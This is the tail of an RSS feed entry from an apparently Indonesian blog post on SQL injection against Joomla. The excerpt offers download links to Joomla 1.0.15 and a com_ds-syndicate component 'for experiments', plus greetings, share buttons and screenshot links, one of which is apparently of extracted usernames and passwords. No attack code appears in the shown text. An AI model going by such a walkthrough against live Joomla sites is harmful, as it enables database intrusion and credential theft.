<p>Untuk keperluan eksperimen, silahkan download filenya di sini. <br /><a href="http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip" target="_self">http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip</a><br /><a href="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz" target="_self">http://networkandgame.890m.com/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz</a></p>
<p>greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya<br />Peterpanz<br />
yang kerepotan ngurus skripsi juga <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> , mr.freeman, for jojo too,</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/101/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/101/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/101/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=101&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/11/16/implementasi-sql-injection-pada-joomlaby_anjar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>

		<media:content url="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/joomla.jpg" medium="image" />

		<media:content url="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/feed.JPG" medium="image" />

		<media:content url="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/errror.JPG" medium="image" />

		<media:content url="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/download.jpg" medium="image" />

		<media:content url="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/angka2.jpg" medium="image" />

		<media:content url="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/title.jpg" medium="image" />

		<media:content url="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/usernamepassword.jpg" medium="image" />
	</item>
	</channel>
</rss>
